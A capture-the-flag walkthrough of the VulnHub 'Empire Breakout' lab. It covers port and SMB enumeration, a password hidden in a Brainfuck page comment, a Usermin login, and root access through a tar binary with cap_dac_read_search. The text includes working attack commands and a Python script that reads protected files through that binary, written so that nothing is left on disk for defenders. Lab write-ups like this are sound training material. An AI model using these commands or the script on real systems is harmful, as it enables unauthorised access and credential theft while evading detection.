EMPIRE BREAKOUT Lab Walkthrough
Disclaimer
These notes exist only to help fellow practitioners learn. The sites mentioned below are used solely for study; anything beyond that is unrelated to the author. Do not cross the legal red line; the consequences are yours alone.
✍🏻 About the author: working in cyber security; currently a learner, honoured to be a sharer, and ultimately aiming to be a pioneer. It is fun and very meaningful.
🤵♂️ Homepage: @One_Blanks
This series takes you into realistic penetration-testing environments. The articles do not hand you the answers; they walk you through information gathering and exploitation step by step, including the pitfalls I fell into along the way. Real engagements are usually even more frustrating than this, and skill only comes from practice.
Lab download: https://www.vulnhub.com/entry/empire-breakout,751/
Reference article: https://mp.weixin.qq.com/s/aDRrVTpNnzSvR1WwWJNUpQ
I. Host discovery and information gathering
(1) Host discovery
arp-scan -l
(2) Set an environment variable for the target
export ip=192.168.1.131
(3) Port scan (all TCP ports)
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
20000/tcp open dnp
MAC Address: 00:0C:29:9F:48:84 (VMware)
(4) Service and version detection
nmap -sS -sV -O -p80,139,445,10000,20000 $ip
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
10000/tcp open http MiniServ 1.981 (Webmin httpd)
20000/tcp open http MiniServ 1.830 (Webmin httpd)
MAC Address: 00:0C:29:9F:48:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
(5) Vulnerability script scan
nmap --script=vuln -p80,139,445,10000,20000 $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 03:26 EDT
Nmap scan report for 192.168.1.131
Host is up (0.00029s latency).
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.131
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.131:80/manual/es/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/pt-br/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/da/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/fr/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/de/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/zh-cn/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/ru/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/tr/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/ja/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/en/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/ko/index.html
| Form id:
|_ Form action: https://www.google.com/search
| http-enum:
|_ /manual/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.exploit-db.com/exploits/1997/
| http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
20000/tcp open dnp
MAC Address: 00:0C:29:9F:48:84 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
A note on reading these results before moving on: the http-csrf "vulnerabilities" are the search forms inside the Apache manual under /manual/, whose action points at google.com, so they are documentation pages and not a flaw in the application. The http-vuln-cve2006-3392 hit on port 10000 also deserves scepticism: that CVE affects Webmin before 1.290, while the banner here is MiniServ 1.981, so treat it as a likely false positive unless you confirm it by hand.
II. Exploitation
(1) Port 80: web application
Known exploits (N-day):
searchsploit Apache 2.4.51
No results for this version.
Browse to the site:
http://192.168.1.131
It is an Apache default landing page and not useful by itself, but viewing the page source reveals a comment:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
This is Brainfuck, an esoteric programming language. It can be decoded with the online tool below, or with any Brainfuck interpreter:
https://www.splitbrain.org/services/ook
Decoding it gives:
.2uqPEfj3D<P'a-3
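An added example, not part of the original post: a small Brainfuck interpreter in Python so the comment can be decoded offline. Pasting a string that turns out to be a credential into a third-party website is a habit worth breaking. The program constant is the string from the page source; nothing else is assumed.

```python
"""Added example (not from the original post): decode the Brainfuck comment
found in the page source locally instead of through a web service."""

# The exact program from the page source, split one output character per line.
BF_FROM_PAGE_SOURCE = (
    "++++++++++[>+>+++>+++++++>++++++++++<<<<-]"  # fill cells with 10, 30, 70, 100
    ">>++++++++++++++++."    # '.'
    "++++."                  # '2'
    ">>+++++++++++++++++."   # 'u'
    "----."                  # 'q'
    "<++++++++++."           # 'P'
    "-----------."           # 'E'
    ">-----------."          # 'f'
    "++++."                  # 'j'
    "<<+."                   # '3'
    ">-."                    # 'D'
    "--------."              # '<'
    "++++++++++++++++++++."  # 'P'
    "<------------."         # the ASCII apostrophe (0x27)
    ">>---------."           # 'a'
    "<<++++++."              # '-'
    "++++++."                # '3'
)


def run_brainfuck(program: str, tape_size: int = 30000) -> str:
    """Execute a Brainfuck program with no input and return what it prints.

    The eight commands: > and < move the data pointer; + and - change the
    current cell modulo 256 (an unsigned byte); . emits the cell as a
    character; , reads input (no input here, so the cell becomes 0);
    [ and ] loop while the current cell is non-zero.  Anything else is a
    comment and is skipped.
    """
    # Pre-compute matching brackets so jumps are O(1) and mismatches fail early.
    jump, stack = {}, []
    for i, c in enumerate(program):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = bytearray(tape_size)
    ptr = pc = 0
    out = []
    while pc < len(program):
        c = program[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = 0  # no stdin in this use case
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]  # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]  # back to the matching '['
        pc += 1
    return "".join(out)


if __name__ == "__main__":
    print(run_brainfuck(BF_FROM_PAGE_SOURCE))
```

Note that the decoded value contains a plain ASCII apostrophe (0x27); blog editors tend to turn it into a curly quote, which will not work as a password.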
Directory brute force (optionally through a proxy):
dirsearch -u http://192.168.1.131/
[03:50:43] 301 - 315B - /manual -> http://192.168.1.131/manual/
[03:50:43] 200 - 208B - /manual/index.html
or
dirb http://192.168.1.131/
(2) Ports 139 and 445: SMB
Enumeration:
enum4linux -a 192.168.1.131
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Apr 3 09:47:43 2025
=========================================( Target Information )=========================================
Target ........... 192.168.1.131
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.1.131 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.1.131 )===============================
Looking up status of 192.168.1.131
BREAKOUT <00> - B <ACTIVE> Workstation Service
BREAKOUT <03> - B <ACTIVE> Messenger Service
BREAKOUT <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================( Session Check on 192.168.1.131 )===================================
[+] Server 192.168.1.131 allows sessions using username '', password ''
================================( Getting domain SID for 192.168.1.131 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.1.131 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.1.131 from srvinfo:
BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================( Users on 192.168.1.131 )=======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
=================================( Share Enumeration on 192.168.1.131 )=================================
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.1.131 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 192.168.1.131
//192.168.1.131/print$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.1.131/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.1.131 )===========================
[+] Attaching to 192.168.1.131 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BREAKOUT
[+] Builtin
[+] Password Info for Domain: BREAKOUT
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.1.131 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 192.168.1.131 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
===============================( Getting printer info for 192.168.1.131 )===============================
No printers returned.
enum4linux complete on Thu Apr 3 09:47:56 2025
The RID cycling pass reveals a local Unix user: cyber
Try a null (anonymous) session to list shares:
smbclient -L //192.168.1.131 -N
smbmap -H 192.168.1.131
Known exploits (N-day):
searchsploit Samba 4.13.5-Debian
No results.
(3) Ports 10000 and 20000
https://192.168.1.131:20000/
This is the Usermin login page.
https://192.168.1.131:10000/
This is the Webmin login page.
We now have a username and a password:
cyber / .2uqPEfj3D<P'a-3
Logging in with them succeeds on Usermin (port 20000).
III. Initial foothold
Once logged in to Usermin we immediately have command execution through the web interface.
It also gives a usable interactive terminal.
IV. Privilege escalation
Enumerating as the low-privileged user
[cyber@breakout ~]$ ls -liah
total 568K
790814 drwxr-xr-x 8 cyber cyber 4.0K Apr 3 10:11 .
783372 drwxr-xr-x 3 root root 4.0K Oct 19 2021 ..
791181 prw-r--r-- 1 cyber cyber 0 Apr 3 10:11 backpipe
791183 -rw------- 1 cyber cyber 0 Oct 20 2021 .bash_history
790817 -rw-r--r-- 1 cyber cyber 220 Oct 19 2021 .bash_logout
790816 -rw-r--r-- 1 cyber cyber 3.5K Oct 19 2021 .bashrc
790841 drwxr-xr-x 2 cyber cyber 4.0K Oct 19 2021 .filemin
790838 drwx------ 2 cyber cyber 4.0K Oct 19 2021 .gnupg
790853 drwxr-xr-x 3 cyber cyber 4.0K Oct 19 2021 .local
790815 -rw-r--r-- 1 cyber cyber 807 Oct 19 2021 .profile
790830 drwx------ 2 cyber cyber 4.0K Oct 19 2021 .spamassassin
791179 -rwxr-xr-x 1 root root 520K Oct 19 2021 tar
790836 drwxr-xr-x 2 cyber cyber 4.0K Oct 20 2021 .tmp
790822 drwx------ 17 cyber cyber 4.0K Apr 3 10:02 .usermin
790857 -rw-r--r-- 1 cyber cyber 48 Oct 19 2021 user.txt
[cyber@breakout ~]$ cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
Besides the user flag, the home directory holds a root-owned, executable copy of tar (520K), which is unusual enough to investigate.
[cyber@breakout ~]$ ./tar
./tar: You must specify one of the '-Acdtrux', '--delete' or '--test-label' options
Try './tar --help' or './tar --usage' for more information.
[cyber@breakout ~]$ ./tar --usage
Usage: tar [-AcdrtuxGnSkUWOmpsMBiajJzZhPlRvwo?] [-g FILE] [-C DIR] [-T FILE]
[-X FILE] [-f ARCHIVE] [-F NAME] [-L NUMBER] [-b BLOCKS]
[-H FORMAT] [-V TEXT] [-I PROG] [-K MEMBER-NAME] [-N DATE-OR-FILE]
[--catenate] [--concatenate] [--create] [--delete] [--diff]
[--compare] [--append] [--test-label] [--list] [--update]
[--extract] [--get] [--check-device] [--listed-incremental=FILE]
[--incremental] [--hole-detection=TYPE] [--ignore-failed-read]
[--level=NUMBER] [--no-check-device] [--no-seek] [--seek]
[--occurrence[=NUMBER]] [--sparse-version=MAJOR[.MINOR]] [--sparse]
[--add-file=FILE] [--directory=DIR] [--exclude=PATTERN]
[--exclude-backups] [--exclude-caches] [--exclude-caches-all]
[--exclude-caches-under] [--exclude-ignore=FILE]
[--exclude-ignore-recursive=FILE] [--exclude-tag=FILE]
[--exclude-tag-all=FILE] [--exclude-tag-under=FILE] [--exclude-vcs]
[--exclude-vcs-ignores] [--no-null] [--no-recursion] [--no-unquote]
[--no-verbatim-files-from] [--null] [--recursion]
[--files-from=FILE] [--unquote] [--verbatim-files-from]
[--exclude-from=FILE] [--anchored] [--ignore-case] [--no-anchored]
[--no-ignore-case] [--no-wildcards] [--no-wildcards-match-slash]
[--wildcards] [--wildcards-match-slash] [--keep-directory-symlink]
[--keep-newer-files] [--keep-old-files] [--no-overwrite-dir]
[--one-top-level[=DIR]] [--overwrite] [--overwrite-dir]
[--recursive-unlink] [--remove-files] [--skip-old-files]
[--unlink-first] [--verify] [--ignore-command-error]
[--no-ignore-command-error] [--to-stdout] [--to-command=COMMAND]
[--atime-preserve[=METHOD]] [--clamp-mtime]
[--delay-directory-restore] [--group=NAME] [--group-map=FILE]
[--mode=CHANGES] [--mtime=DATE-OR-FILE] [--touch]
[--no-delay-directory-restore] [--no-same-owner]
[--no-same-permissions] [--numeric-owner] [--owner=NAME]
[--owner-map=FILE] [--preserve-permissions] [--same-permissions]
[--same-owner] [--sort=ORDER] [--preserve-order] [--same-order]
[--acls] [--no-acls] [--no-selinux] [--no-xattrs] [--selinux]
[--xattrs] [--xattrs-exclude=MASK] [--xattrs-include=MASK]
[--force-local] [--file=ARCHIVE] [--info-script=NAME]
[--new-volume-script=NAME] [--tape-length=NUMBER] [--multi-volume]
[--rmt-command=COMMAND] [--rsh-command=COMMAND] [--volno-file=FILE]
[--blocking-factor=BLOCKS] [--read-full-records] [--ignore-zeros]
[--record-size=NUMBER] [--format=FORMAT] [-- gnu] [-- oldgnu] [--
pax] [-- posix] [-- ustar] [-- v7] [--old-archive]
[--portability]
[--pax-option=keyword[[:]=value][,keyword[[:]=value]]...] [--posix]
[--label=TEXT] [--auto-compress] [--use-compress-program=PROG]
[--bzip2] [--xz] [--lzip] [--lzma] [--lzop] [--no-auto-compress]
[--zstd] [--gzip] [--gunzip] [--ungzip] [--compress] [--uncompress]
[--backup[=CONTROL]] [--hard-dereference] [--dereference]
[--starting-file=MEMBER-NAME] [--newer-mtime=DATE]
[--newer=DATE-OR-FILE] [--after-date=DATE-OR-FILE]
[--one-file-system] [--absolute-names] [--suffix=STRING]
[--strip-components=NUMBER] [--transform=EXPRESSION]
[--xform=EXPRESSION] [--checkpoint[=NUMBER]]
[--checkpoint-action=ACTION] [--full-time] [--index-file=FILE]
[--check-links] [--no-quote-chars=STRING] [--quote-chars=STRING]
[--quoting-style=STYLE] [--block-number] [--show-defaults]
[--show-omitted-dirs] [--show-snapshot-field-ranges]
[--show-transformed-names] [--show-stored-names]
[--totals[=SIGNAL]] [--utc] [--verbose] [--warning=KEYWORD]
[--interactive] [--confirmation] [--help] [--restrict] [--usage]
[--version] [FILE]...
We can inspect the binary's file capabilities with getcap:
[cyber@breakout ~]$ getcap /home/cyber/tar
/home/cyber/tar cap_dac_read_search=ep
It carries cap_dac_read_search. That capability lets the process bypass file read permission checks and directory read/search checks, so anyone who can run this tar can archive files they have no read permission on, then extract and read the copy.
The textbook move is to archive /etc/shadow and crack the root hash, but in this case the hash would not crack.
So we keep hunting for sensitive files and find one in /var/backups:
/var/backups/.old_pass.bak
We cannot read it directly, so we move to a directory we can write to (/tmp) and go through the capability-bearing tar:
cd /tmp
1. Archive: /home/cyber/tar -cvf 1.tar /var/backups/.old_pass.bak
   (ls confirms that 1.tar was created)
2. Extract: /home/cyber/tar -xvf 1.tar
3. Read: cat /tmp/var/backups/.old_pass.bak
This gives us the password:
Ts&4&YurgtRX(=~h
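An added example, not code from the original writeup: the same cap_dac_read_search abuse, but streamed through memory so no archive and no extracted tree are left behind in /tmp for a defender to find. It assumes the capability-bearing binary is at /home/cyber/tar, as on this target; if that path is absent (for instance on a test machine) it falls back to the system tar, which exercises the plumbing but not the permission bypass.

```python
"""Added example (not from the original writeup): read a file, or list a
directory, through a tar binary that carries cap_dac_read_search.

The privileged tar writes the archive to stdout and Python's tarfile module
pulls the member out of memory, so nothing is written to the filesystem.

Assumption: CAP_TAR is the capability-bearing binary (/home/cyber/tar on the
target).  If it is absent the system tar is used instead, which only shows
the mechanics; the bypass itself exists only inside the privileged process.
"""
from __future__ import annotations

import io
import os
import shutil
import subprocess
import tarfile

CAP_TAR = "/home/cyber/tar"  # path from the writeup
if not os.access(CAP_TAR, os.X_OK):
    CAP_TAR = shutil.which("tar") or "tar"  # fallback: same plumbing, no bypass


def _archive(path: str) -> tarfile.TarFile:
    """Run the privileged tar over `path` and return the archive, in memory.

    The open()/readdir() calls happen inside the tar process, which is where
    cap_dac_read_search applies; this Python process never needs read
    permission on `path` itself.
    """
    proc = subprocess.run(
        [CAP_TAR, "-cf", "-", path],
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,  # hides the "Removing leading `/'" warning
        check=True,
    )
    return tarfile.open(fileobj=io.BytesIO(proc.stdout), mode="r:")


def cap_read(path: str) -> bytes:
    """Return the bytes of a single regular file we could not read directly."""
    with _archive(path) as tar:
        members = tar.getmembers()
        if len(members) != 1 or not members[0].isfile():
            raise IsADirectoryError(path)
        return tar.extractfile(members[0]).read()


def cap_list(path: str) -> list[str]:
    """Return the entries under a directory we could not read directly.

    cap_dac_read_search also bypasses the read bit on directories, so this
    works for a directory such as /root.  Names come back relative to
    `path`, sorted.
    """
    with _archive(path) as tar:
        names = [m.name for m in tar.getmembers()]
    top = min(names, key=len).rstrip("/")  # the directory entry itself
    return sorted(os.path.relpath(n, top) for n in names if n.rstrip("/") != top)


if __name__ == "__main__":
    # On the target this prints the backup password the writeup recovers.
    print(cap_read("/var/backups/.old_pass.bak").decode(errors="replace"))
```

Before reaching for /etc/shadow, it is worth running `getcap -r / 2>/dev/null` as well: the writeup checked only the one binary it stumbled on, and the same capability on any other file-reading tool would give the same result.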
V. Getting root
We have a password, but su and sudo are both locked down for this user, so we need another way to use it.
The web interface works again: log out of cyber, then log in as root on the web login page and check whether that gives us root-level access.
root
Ts&4&YurgtRX(=~h
Privilege escalation successful: the backup file held the current root password.